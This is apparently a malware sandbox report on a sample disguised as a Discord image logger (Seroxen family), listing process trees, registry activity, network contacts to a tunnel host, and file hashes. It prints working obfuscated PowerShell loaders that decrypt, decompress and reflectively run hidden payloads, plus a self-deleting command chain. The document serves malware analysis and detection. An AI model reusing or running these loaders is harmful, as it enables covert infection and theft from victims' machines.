System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{83febc94-1ca6-478f-8026-e03b441fe7c1}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3c5b91d6-04b0-4f4a-a74e-50dec0c968d1}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e7f6cb63-c51b-41a7-b34e-90e070577354}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"
C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 8.8.8.8:53 | nervous-water-68160.pktriot.net | udp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
| US | 165.227.31.192:22400 | nervous-water-68160.pktriot.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/4252-6-0x00007FF894013000-0x00007FF894015000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dj1kg15s.2ae.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\System32\ucrtbased.dll
| MD5 | 7873612dddd9152d70d892427bc45ef0 |
| SHA1 | ab9079a43a784471ca31c4f0a34b698d99334dfa |
| SHA256 | 203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf |
| SHA512 | d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083 |
C:\Windows\System32\vcruntime140d.dll
| MD5 | a366d6623c14c377c682d6b5451575e6 |
| SHA1 | a8894fcfb3aa06ad073b1f581b2e749b54827971 |
| SHA256 | 7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6 |
| SHA512 | cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11 |
C:\Windows\System32\vcruntime140_1d.dll
| MD5 | 9ef28981adcbf4360de5f11b8f4ecff9 |
| SHA1 | 219aaa1a617b1dfa36f3928bd1020e410666134f |
| SHA256 | 8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a |
| SHA512 | ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c |
Analysis: behavioral3
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20241023-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2808 wrote to memory of 2684 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2808 wrote to memory of 2684 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2808 wrote to memory of 2684 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2684 wrote to memory of 2664 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2684 wrote to memory of 2664 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2684 wrote to memory of 2664 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2684 wrote to memory of 2664 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 0f948adab6823f1898be9db39ff7debb |
| SHA1 | 36672c3f675cc91e7e615f30b572619e25e45f5a |
| SHA256 | a3cd44e09c90567367fe793d938c59a30e8f2844f769ebbf4bcfbb33554fd5e6 |
| SHA512 | 0a6a3d4362c92c115054d32488de2cefe97e3739554a38eacb3ac68217041064eb459a3994164c004913caaffe316410baa1be4408049ffedbdaf8112326937b |
Analysis: behavioral5
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2492 wrote to memory of 2184 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2492 wrote to memory of 2184 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2492 wrote to memory of 2184 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2184 wrote to memory of 2836 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2184 wrote to memory of 2836 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2184 wrote to memory of 2836 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2184 wrote to memory of 2836 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\browsers.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 5e32b031e7056ac3d4cfd7930526f53a |
| SHA1 | 1640491037ba4ff3abefd8b0cf9fd6b7246ec505 |
| SHA256 | 1dab35e64e8597fe292c7b9af60eb6dbfeb5e81ebbe04e18fcac2a1cb5f70da6 |
| SHA512 | e404490b9ad96d95c308ebadf50e696fb12103e1e59f6fa930be34916003aa8de88b56bb57afad9cddefbd57471c5b37cb914142be4de4319b542cdebabb9711 |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Seroxen family
Seroxen, Ser0xen
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\$sxr-seroxen2\$sxr-Uni.bat | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
Analysis: behavioral7
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
120s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 264 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 264 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 264 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2716 wrote to memory of 2864 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2716 wrote to memory of 2864 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2716 wrote to memory of 2864 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2716 wrote to memory of 2864 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 22e49b9f984b5f8c93f4d9f5a157ec83 |
| SHA1 | dd20a0365bf6f92bf314bb3ec5f2cafd1c71a2bc |
| SHA256 | c9a1398a4e5390c1bc41e6cc1ec2c0bc56a5567e81c9c4e7cd87c799b5456f33 |
| SHA512 | 88b93990a46837759a8a579d1ad59c4ffecc9ff8590bb0eda0a0a61685a9638a2475e42d792e2aea50a559dc66b75045397fe61cdb76b5df885ad66e68cbb897 |
Analysis: behavioral8
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
94s
Max time network
145s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
94s
Max time network
129s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
